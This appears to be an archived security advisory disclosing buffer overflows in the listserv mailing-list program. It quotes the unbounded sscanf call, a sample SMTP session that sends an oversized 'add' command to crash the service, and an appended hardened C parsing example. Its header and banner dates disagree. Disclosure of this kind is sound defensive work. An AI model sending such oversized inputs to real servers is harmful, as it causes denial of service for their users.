(no subject)

PLaGuEZ (root@MEAT.PLAGUEZ.ORG)
Sat, 01 Jan 1994 17:50:59 +0100

listserv buffer overflow(s)

plaguez security advisory no. 4

listserv buffer overflow(s)

Hello all,

[forget it if it's known stuff :), however, the archives
from sunsite still have this hole.]

I have found several buffer overflows in listserv,
a widely used mailing-list management program.

By exploiting those vulnerabilities, malicious hackers can
remotely execute arbitrary commands on the target machine:
typically, place backdoors on the system or remove users'
mail files, since listserv has to run sgid 'mail'.

In practice, though, the impact is harmless because it is almost
impossible to predict the parameters needed for the
actual overflow, i.e. the stack address and the buffer size.
The hole is still annoying because it provides an
efficient DoS attack: the attacker would repeatedly
connect to the target host and send an oversized buffer,
causing many segfaults on the target system.

Technical stuff:
----------------
User commands are sent directly in the body of the
message, where users can write whatever they want.
Potential buffer overflows are located in the functions
that handle those commands (the overflows in main() are
mostly harmless).
e.g. in file subscribe.c:

function subscription(char *from, char *command, int add,
                      int outsider)
{
    char tmp[256], grp[256], adr[256];
    int i;
    [...]
    /* "%s" carries no width limit: a token longer than 255
       characters runs past the end of tmp, adr or grp */
    i = sscanf(command, "%s%s%s", tmp, adr, grp);
    [...]
}

Here, command is the raw user command, passed through
unmodified and without any length check, so an overflow
can occur in that sscanf call.

Sample exploit:
---------------

$ telnet xxxxxx.xxx 25

Trying 123.123.123.123...
Connected to 123.123.123.123
Escape character is '^]'.
220 xxxxxx.xxx ESMTP Sendmail 8.8.5/8.8.2; Fri, 20 Jun 1997 08:54:52 -0400
MAIL FROM: oooops@oooops.org
250 ooops ... Sender ok
RCPT TO: Listserv
250 Listserv ... Recipient ok
DATA
354 Enter mail, end with "." on a line by itself
From: noone

add aaaaaaaaaaaaaaa[...lotsa chars go here]aaaaaaaaaaaaa aaaaaa aaaaaa
.
250 RAFZ04965 Message accepted for delivery
QUIT
221 xxxxxxx.xxx closing connection

The listserv process handling this message will overflow its buffer and then crash.

Fix:
----
Sorry, I'm too lazy to write a fix... A possible one would be
to use dynamically sized strings, or (easier to implement)
to truncate each command to its first 200 characters, for
example.
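As an added example (not listserv's own code, nor the author's fix), the following shows the hardened form of the sscanf call from the "Technical stuff" section combined with the 200-character cap suggested above; subscription_bounded, parse_verdict, check_command and the constructed "add ..." input are assumptions made for this illustration:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define FIELD 256        /* size of tmp/adr/grp in the advisory's snippet */
#define MAX_COMMAND 200  /* the per-command cap the advisory suggests */

enum { CMD_OK = 0, CMD_TOO_LONG = -1, CMD_BAD_ARGS = -2, CMD_NOMEM = -3 };

/* Hardened replacement for the advisory's sscanf call. Two independent
 * bounds: the whole command is rejected above MAX_COMMAND bytes, so no
 * token can approach a buffer's size, and every %s still carries a width
 * of FIELD-1, so even a mis-set cap can never write past tmp, adr or grp.
 * A token cut by the width alone would spill into the next field and
 * silently change the parse, which is why the length check comes first. */
int subscription_bounded(const char *command,
                         char tmp[FIELD], char adr[FIELD], char grp[FIELD])
{
    if (strlen(command) > MAX_COMMAND)
        return CMD_TOO_LONG;
    /* "%255s": buffer size minus one, leaving room for the NUL. */
    if (sscanf(command, "%255s%255s%255s", tmp, adr, grp) != 3)
        return CMD_BAD_ARGS;
    return CMD_OK;
}

/* Parse one command into scratch buffers and return only the verdict. */
int parse_verdict(const char *command)
{
    char tmp[FIELD], adr[FIELD], grp[FIELD];
    return subscription_bounded(command, tmp, adr, grp);
}

/* Constructed input shaped like the advisory's sample message:
 * "add " + n x 'a' + " aaaaaa aaaaaa". Returns the parser's verdict. */
int check_command(size_t n)
{
    char *cmd = malloc(n + 32);
    int rc;
    if (cmd == NULL)
        return CMD_NOMEM;
    strcpy(cmd, "add ");
    memset(cmd + 4, 'a', n);
    strcpy(cmd + 4 + n, " aaaaaa aaaaaa");
    rc = parse_verdict(cmd);
    free(cmd);
    return rc;
}
```

With the length check in place, an oversized "add" line is refused before sscanf ever runs, so the process neither overflows nor segfaults.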

that's all for this time,

plaguez

------------------------
plaguez / libpcap
dube0866@eurobretagne.fr
http://www.innu.org
------------------------
ln -sf flames /dev/null